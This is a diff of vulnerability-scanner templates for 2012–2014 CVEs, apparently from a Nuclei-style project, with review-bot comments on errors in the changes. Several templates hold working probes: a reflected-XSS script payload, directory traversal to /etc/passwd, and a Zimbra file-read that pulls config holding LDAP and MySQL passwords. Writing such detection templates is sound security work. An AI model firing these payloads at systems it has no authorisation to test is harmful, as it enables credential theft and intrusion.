@@ -1,12 +1,18 @@ id: CVE-2012-4940 info: - name: Axigen Mail Server - 'Filename' Directory Traversal + name: Axigen Mail Server Filename Directory Traversal author: dhiyaneshDk severity: high - description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. - reference: https://www.exploit-db.com/exploits/37996 - tags: cve,cve2012,axigen,lfi + description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + reference: + - https://www.exploit-db.com/exploits/37996 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 + - http://www.kb.cert.org/vuls/id/586556 + - http://www.securityfocus.com/bid/56343 + classification: + cve-id: CVE-2012-4940 + tags: cve,cve2012,axigen,lfi,mail requests: - method: GET @@ -22,4 +28,6 @@ requests: - "bit app support" - "fonts" - "extensions" - condition: and \ No newline at end of file + condition: and + +# Enhanced by cs on 2022/02/25 diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index cdbbce256d..35eef6218f 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml 
@@ -1,11 +1,17 @@ id: CVE-2012-5913 info: - name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ + - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html + - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt + classification: + cve-id: CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index e2e5f0a70c..a487bd900a 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml 
@@ -5,8 +5,14 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. - reference: http://struts.apache.org/development/2.x/docs/s2-012.html - tags: cve,cve2013,apache,rce,struts + reference: + - http://struts.apache.org/development/2.x/docs/s2-012.html + - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 + - https://bugzilla.redhat.com/show_bug.cgi?id=967655 + remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. + classification: + cve-id: CVE-2013-1965 + tags: cve,cve2013,apache,rce,struts,ognl requests: - method: POST @@ -22,8 +28,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml index eca8e3d253..bb7040e1d4 100644 --- a/cves/2013/CVE-2013-2248.yaml +++ b/cves/2013/CVE-2013-2248.yaml 
@@ -3,9 +3,16 @@ id: CVE-2013-2248 info: name: Apache Struts - Multiple Open Redirection Vulnerabilities author: 0x_Akoko - description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/38666 severity: low + description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + reference: + - https://www.exploit-db.com/exploits/38666 + - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 + - https://cwiki.apache.org/confluence/display/WW/S2-017 + - http://struts.apache.org/release/2.3.x/docs/s2-017.html + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + classification: + cve-id: CVE-2013-2248 tags: cve,cve2013,apache,redirect,struts requests: @@ -17,4 +24,6 @@ requests: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 67158a4a69..a9c45c26ce 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml 
@@ -4,9 +4,15 @@ info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation,dwisiswant0,alex severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. - reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html - tags: cve,cve2013,rce,struts,apache + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + reference: + - http://struts.apache.org/release/2.3.x/docs/s2-016.html + - https://cwiki.apache.org/confluence/display/WW/S2-016 + - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + classification: + cve-id: CVE-2013-2251 + tags: cve,cve2013,rce,struts,apache,ognl requests: - raw: @@ -43,3 +49,5 @@ requests: part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 4b827a6e88..5d169d1e53 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml 
@@ -1,12 +1,17 @@ id: CVE-2013-2287 info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + - http://osvdb.org/90840 + - https://www.dognaedis.com/vulns/DGS-SEC-16.html + classification: + cve-id: CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin - description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index a65162e1be..2f271d0f3b 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml 
@@ -1,12 +1,18 @@ id: CVE-2013-3526 info: - name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html + - http://osvdb.org/92197 + - http://www.securityfocus.com/bid/58948 + classification: + cve-id: CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin - description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index c9217eb4c9..17e8872b64 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml 
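Review bot: The rewritten `description:` in the first hunk ends with a stray `"` (`... via the aoid parameter."`), left over from the old double-quoted scalar; as a plain scalar the quote is now part of the text and will show up in every report that prints the description. Drop it: `description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.`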
@@ -4,11 +4,15 @@ info: name: Javafaces LFI author: Random-Robbie severity: medium - description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. - tags: cve,cve2013,lfi,javafaces,oracle + description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 + - https://www.oracle.com/security-alerts/cpuoct2013.html + - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html + classification: + cve-id: CVE-2013-3827 + tags: cve,cve2013,lfi,javafaces,oracle requests: - method: GET @@ -36,4 +40,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml index 2b2a102326..d2a93dc850 100644 --- a/cves/2013/CVE-2013-4117.yaml +++ b/cves/2013/CVE-2013-4117.yaml 
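Review bot: The rewritten `description:` capitalises a word mid-sentence (`An Unspecified vulnerability in ...`), unlike every other description normalised in this commit; lower-case it to `An unspecified vulnerability in ...`. The two Oracle references added are the same October 2013 CPU advisory under its old and new URL, so one of them is redundant.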
@@ -1,11 +1,17 @@ id: CVE-2013-4117 info: - name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + - http://openwall.com/lists/oss-security/2013/07/11/11 + - http://seclists.org/bugtraq/2013/Jul/17 + - http://osvdb.org/94805 + classification: + cve-id: CVE-2013-4117 tags: cve,cve2013,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml index e2184bc7a0..81f60cc764 100644 --- a/cves/2013/CVE-2013-4625.yaml +++ b/cves/2013/CVE-2013-4625.yaml 
@@ -1,11 +1,18 @@ id: CVE-2013-4625 info: - name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html + - http://osvdb.org/95627 + - http://archives.neohapsis.com/archives/bugtraq/2013-07/0161.html + remediation: Upgrade to Duplicator 0.4.5 or later. + classification: + cve-id: CVE-2013-4625 tags: cve,cve2013,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml index aae2a740e1..c6a9f04a15 100644 --- a/cves/2013/CVE-2013-5528.yaml +++ b/cves/2013/CVE-2013-5528.yaml 
@@ -4,8 +4,14 @@ info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - reference: https://www.exploit-db.com/exploits/40887 + description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + reference: + - https://www.exploit-db.com/exploits/40887 + - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 + - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 + - http://www.securityfocus.com/bid/62960 + classification: + cve-id: CVE-2013-5528 tags: cve,cve2013,lfi,cisco requests: @@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml index e3748feb78..7ad29aa3ce 100644 --- a/cves/2013/CVE-2013-5979.yaml +++ b/cves/2013/CVE-2013-5979.yaml 
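Review bot: The NVD reference added in the first hunk points at the wrong advisory: `https://nvd.nist.gov/vuln/detail/CVE-2014-3120` is the Elasticsearch RCE, whereas `cve-id:` and the Cisco security notice on the next line correctly say CVE-2013-5528. Replace it with `- https://nvd.nist.gov/vuln/detail/CVE-2013-5528`. It is worth scanning the other references added in this batch for the same copy-paste slip.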
@@ -4,11 +4,14 @@ info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. reference: - https://www.exploit-db.com/exploits/26955 + - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - https://www.cvedetails.com/cve/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 + classification: + cve-id: CVE-2013-5979 tags: cve,cve2013,lfi requests: @@ -21,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-6281.yaml b/cves/2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..2abe056dcd --- /dev/null +++ b/cves/2013/CVE-2013-6281.yaml 
@@ -0,0 +1,46 @@ +id: CVE-2013-6281 + +info: + name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + author: random-robbie + severity: medium + description: | + The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + reference: + - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf + - https://www.securityfocus.com/bid/63256/ + - https://wordpress.org/plugins/dhtmlxspreadsheet/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2013-6281 + cwe-id: CWE-79 + metadata: + google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet + verified: "true" + tags: cve,cve2013,wordpress,xss,wp-plugin,wp + +requests: + - raw: + - | + GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "page: ''" + - "dhx_rel_path" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2013/CVE-2013-7091.yaml b/cves/2013/CVE-2013-7091.yaml new file mode 100644 index 0000000000..ae2e8ddeea --- /dev/null +++ b/cves/2013/CVE-2013-7091.yaml 
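Review bot: The body matcher in this new template never checks that the injected payload is reflected: it requires `page: ''` and `dhx_rel_path`, which from the template alone look like static content of spreadsheet.php rather than an echo of the `page` parameter, so a patched plugin that escapes or drops the parameter would still match and be reported as XSS. Add the reflected payload to the body words, e.g. `- "<script>alert(document.domain)</script>"` under the existing `condition: and`, so the match depends on the unescaped echo. The `metadata.verified: "true"` flag does not substitute for that check. Also `tags:` carries both `wp-plugin` and `wp`, while the other WordPress templates in this commit use only `wp-plugin`.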
@@ -0,0 +1,41 @@ +id: CVE-2013-7091 + +info: + name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion + author: rubina119 + severity: critical + description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 + - https://www.exploit-db.com/exploits/30085 + - https://www.exploit-db.com/exploits/30472 + - http://osvdb.org/100747 + classification: + cve-id: CVE-2013-7091 + tags: cve,cve2013,zimbra,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - "zimbra_server_hostname" + - "zimbra_ldap_userdn" + - "zimbra_ldap_password" + - "ldap_postfix_password" + - "ldap_amavis_password" + - "ldap_nginx_password" + - "mysql_root_password" + condition: or + + - type: regex + regex: + - "root=.*:0:0" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index 2b8df419a9..6ad0335e9a 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml 
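Review bot: The second matcher's regex `root=.*:0:0` cannot match an /etc/passwd line, which is colon-separated (`root:x:0:0:`), so the `/etc/passwd` probe in `path:` can never produce a hit and only the localconfig.xml probe does any work. Change it to `- "root:.*:0:0:"`, the form the other traversal templates in this commit were just normalised to. With `matchers-condition: or` and `stop-at-first-match: true` the dead matcher currently only costs a wasted request, but it also hides whether the `%00` truncation still works against the target.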
@@ -4,16 +4,18 @@ info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - tags: cve,cve2013,wordpress,wp-plugin,lfi + - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ + - http://seclists.org/oss-sec/2013/q4/570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2013-7240 cwe-id: CWE-22 + tags: cve,cve2013,wordpress,wp-plugin,lfi requests: - method: GET @@ -34,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml index 7acb0d68b5..35aa39b4b4 100644 --- a/cves/2014/CVE-2014-10037.yaml +++ b/cves/2014/CVE-2014-10037.yaml 
@@ -4,10 +4,14 @@ info: name: DomPHP 0.83 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. reference: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 + - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 + - http://osvdb.org/show/osvdb/102204 + classification: + cve-id: CVE-2014-10037 tags: cve,cve2014,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2321.yaml b/cves/2014/CVE-2014-2321.yaml index c26212d1b8..7f328db084 100644 --- a/cves/2014/CVE-2014-2321.yaml +++ b/cves/2014/CVE-2014-2321.yaml 
@@ -2,12 +2,17 @@ id: CVE-2014-2321 info: name: ZTE Cable Modem Web Shell - description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. author: geeknik + severity: high + description: | + ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. reference: - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - severity: high + - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 + - http://www.kb.cert.org/vuls/id/600724 + classification: + cve-id: CVE-2014-2321 tags: iot,cve,cve2014,zte requests: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index 61d21ce54c..c813730817 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml 
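Review bot: Subject and verb disagree in the new block-scalar `description:` (`ZTE F460 and F660 cable modems allows`); it should read `ZTE F460 and F660 cable modems allow remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, ...`. The scalar is also written with `|`, which keeps a trailing newline in the description; a plain scalar, as the other templates in this commit use, or `>-` avoids that.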
@@ -1,17 +1,21 @@ id: CVE-2014-2323 info: - name: Lighttpd 1.4.34 SQL injection and path traversal - description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. - reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + name: Lighttpd 1.4.34 SQL Injection and Path Traversal author: geeknik severity: critical - tags: cve,cve2014,sqli,lighttpd + description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 + - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + - http://www.lighttpd.net/2014/3/12/1.4.35/ + - http://seclists.org/oss-sec/2014/q1/561 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 + tags: cve,cve2014,sqli,lighttpd,injection requests: - raw: @@ -24,3 +28,5 @@ requests: - type: regex regex: - "root:[x*]:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 1586860d75..bb404d9069 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml 
@@ -4,12 +4,18 @@ info: name: Arbitrary file read in dompdf < v0.6.0 author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/33004 - tags: cve,cve2014,dompdf,lfi + description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 + - https://www.exploit-db.com/exploits/33004 + - http://seclists.org/fulldisclosure/2014/Apr/258 + - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ + classification: + cve-id: CVE-2014-2383 metadata: - win-payload: "/dompdf.php?input_file=C:/windows/win.ini" - unix-payload: "/dompdf.php?input_file=/etc/passwd" - description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter." + unix-payload: /dompdf.php?input_file=/etc/passwd + win-payload: /dompdf.php?input_file=C:/windows/win.ini + tags: cve,cve2014,dompdf,lfi requests: - method: GET @@ -32,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-2908.yaml b/cves/2014/CVE-2014-2908.yaml index 2b589fa8fe..a7a471167d 100644 --- a/cves/2014/CVE-2014-2908.yaml +++ b/cves/2014/CVE-2014-2908.yaml 
@@ -4,10 +4,15 @@ info: name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. reference: - https://www.exploit-db.com/exploits/44687 + - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 + - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 + remediation: Upgrade to v4.0 or later. + classification: + cve-id: CVE-2014-2908 tags: cve,cve2014,xss,siemens requests: @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml index c0b20521c0..2c2c67d121 100644 --- a/cves/2014/CVE-2014-2962.yaml +++ b/cves/2014/CVE-2014-2962.yaml 
